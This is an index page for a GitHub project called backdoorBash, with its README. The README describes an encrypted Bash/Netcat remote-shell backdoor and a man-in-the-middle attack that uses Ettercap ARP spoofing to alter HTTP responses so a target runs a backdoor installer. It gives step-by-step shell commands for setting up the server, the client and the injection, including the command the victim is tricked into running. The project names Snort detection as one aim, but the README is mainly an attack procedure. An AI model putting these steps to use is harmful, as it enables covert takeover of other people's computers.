Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/pilebones/backdoorbash
Unix remote-shell backdoor develop with Bash, Netcat, OpenSSL (data encryption with AES-128bit)
https://github.com/pilebones/backdoorbash
Last synced: 17 days ago
JSON representation
Unix remote-shell backdoor develop with Bash, Netcat, OpenSSL (data encryption with AES-128bit)
- Host: GitHub
- URL: https://github.com/pilebones/backdoorbash
- Owner: pilebones
- License: gpl-2.0
- Created: 2014-12-10T22:08:04.000Z (about 10 years ago)
- Default Branch: master
- Last Pushed: 2017-10-21T14:36:17.000Z (about 7 years ago)
- Last Synced: 2023-02-27T08:05:31.259Z (almost 2 years ago)
- Language: Shell
- Homepage:
- Size: 1.17 MB
- Stars: 26
- Watchers: 1
- Forks: 14
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
backdoorBash
============
Unix remote-shell backdoor develop with Bash, Netcat, OpenSSL (data encryption with AES-128bit)
## Introduction
This project is associated to another mine :
- https://github.com/pilebones/etterfilterSamples
- https://github.com/pilebones/hostingBackdoorInstaller
The main goals of this project is to implement an attack scenario as below :
- Implement backdoor like remote-shell with Bash
- Attack Man In the middle with Ettercap (like ARP Spoofing)
- Hosting a backdoor installer
- Automate data alteration to inject our backdoor inside the computer of target by a browser
- If the target run (naively) the script (ie: the backdoor installer) without reading source-code the computer is infected and the attacker will obtain a remote-access command
- Detect and prevent this kind of attack with NIDS tool as Snort
Notice :
- The programming language was choose only for a Proof of Concept (POC)
- The socket layer is assumed by a portable version of Netcat. I compiled Netcat for i686 and x86_64 computer architecture a put the binary inside this project.
- The transmited data were encrypted with AES-128 (without using Cryptocat). The data are encrypted on the fly via OpenSSL.
## Requirements
- openssl (tested with v1.0.1j)
- ettercap (>= v0.8.1)
- etterfilter (>= v0.8.1)
- etterfilter (>= v0.8.1)
- netcat (The compiled version is "The GNU Netcat" [not BSD release] v0.7.1)
## How it work ?
The backdoor-client connection work localy and remontly (inside same private network with the same access-point), ie : see "$HOST" inside "config.sh".
### Simple test
```bash
git clone [email protected]:pilebones/backdoorBash.git
cd backdoorBash
cp config.sh.sample config.sh
vim config.sh
./server.sh
HOST=192.168.0.x ./client.sh
```
.... And try to execute some shell command
### Real condition
```bash
git clone [email protected]:pilebones/backdoorBash.git
git clone [email protected]:pilebones/etterfilterSamples.git
git clone [email protected]:pilebones/hostingBackdoorInstaller.git
cp backdoorBash/config.sh.sample backdoorBash/config.sh
vim backdoorBash/config.sh
# For export remove client.sh *.log config.sh.sample
tar xvzf hostingBackdoorInstaller/export.tar.gz backdoorBash/
# Configure your vhost to hosting hostingBackdoorInstaller's project
cd etterfilterSamples/inject_backdoor_installer/
# Update Redirect URL from "fake-http-redirect.txt"
vim fake-http-redirect.txt
IFACE=wlanX IP_AP=192.168.0.1 IP_TARGET=192.168.0.x ./run
# From target try to download a shell script like "test.sh" or try with 404 Not Found page (same behavior => inject backdoor installer)
# From target : "chmod +x bd_installer.sh && ./bd_installer.sh"
HOST=192.168.0.x ./client.sh
```
## Limitations
This backdoor is writing in bash programming language => It work only on Unix OS.
Currently, tested only on :
- Archlinux
- Debian 7
- Ubuntu 14.10
Warning :
Some recent router/box/AP/switch prevent this kind of MiTM attack. In this case, Ettercap could relay only one-way network-packets (From target to AP but not from AP to target). So Ettercap can alter the HTTP response to redirect to the backdoor's installer.